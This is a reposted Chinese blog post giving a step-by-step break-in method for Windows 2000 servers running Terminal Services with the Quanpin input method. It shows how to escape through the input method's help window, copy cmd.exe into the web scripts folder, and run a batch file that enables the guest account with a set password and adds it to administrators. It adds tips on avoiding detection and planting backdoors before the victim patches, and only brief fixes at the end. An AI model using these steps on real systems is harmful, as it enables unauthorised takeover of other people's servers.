3389埠的入侵,Win Server2000 全拼輸入法漏洞(轉)

ljm0211發表於2012-07-02
由於微軟對中國產品不付責任的態度,使得安裝了終端服務和全拼的w2k 伺服器存在著遠端登陸並能獲取超級使用者許可權的嚴重漏洞。
其過程如下:

1.掃描 3389 port 終端服務預設;
2.用終端客戶端程式進行連線;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點滑鼠右鍵(如果其幫助選單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"選單上點右鍵---&gt跳轉到URL",輸入:c:\winnt\system32\cmd.exe.(如果不能確定NT系統目錄,則輸入:c:\ 或d:\
……進行查詢確定);
5.選擇"儲存到磁碟" 選擇目錄:c:\inetpub\scripts\,因實際上是對方伺服器上檔案自身的複製操作,所以這個過程很快就會完成;
6.開啟IE,輸入 dir 怎麼樣?有cmd.exe檔案了吧?這我們就完成了第一步;
7 echo net user guest /active:yes>go.bat
8 echo net user guest elise>>go.bat
9 echo net localgroup administrators /add
guest>>go.bat
10 type go.bat 看看我們的批檔案內容是否如下:

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"選單上點右鍵---&gt跳轉到URL",輸入:c:\inetpub\scripts\go.bat ---&gt在磁碟當前位置執行;
12. 呵呵,大功告成啦,這樣我們就啟用了伺服器的geust帳戶,密碼為:elise,超級使用者呢!(我喜歡guest而不是建立新帳戶,這樣似乎不易被發現 些),這樣你就可用IPC$連線,想怎樣做就怎樣做了,當然,你也可用guest直接登陸到他的伺服器,到他機器上去跳舞吧:-)

注意事項:
1.當你用終端客戶端程式登陸到他的伺服器時,你的所有操作不會在他的機器上反應出來,但如果他正開啟了終端服務管理器,你就慘了了:(這時他能看到你所開啟的程式id、程式映象,你的ip及機器名,並能發訊息給你!
2.當你連線時,會加重對方伺服器的負荷,非常容易造成對方當機和斷線,所以你的操作快點為妙。
3.儘快做好後門,暫時不要上傳任何程式,一是防止斷線,二是防止對方打上補丁!
個人觀點:
1.在IE下,所擁有的只是iusr_machine許可權,因而,你不要設想去做越權的事情,如啟動telnet、木馬等;
2.url的跳轉下,你將擁有超級使用者的許可權,好好利用吧
3.跳轉到哪個目錄下,通常只能檢視、執行當前目錄的檔案,不能進入到子目錄,如想進入,再跳一次吧!:)
4.此法似乎與對方的防火牆無關哦!
5.據本人實際操作,發現極易斷線,但應與佔用伺服器資源無關。對方是384M RAM+PIII,是靜態IP,主要是做資料庫伺服器,RAID硬碟,SCSI CD
ROM,開機18天了,02:00進去時,仍時常吊線。

堵漏辦法:
1.打補丁;
2.刪掉全拼輸入法,用標準就成了嘛^_^;
3.服務中關掉:Terminal Services,服務名稱:TermService,對應程式名:system32\termsrv.exe;

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734408/,如需轉載,請註明出處,否則將追究法律責任。

相關文章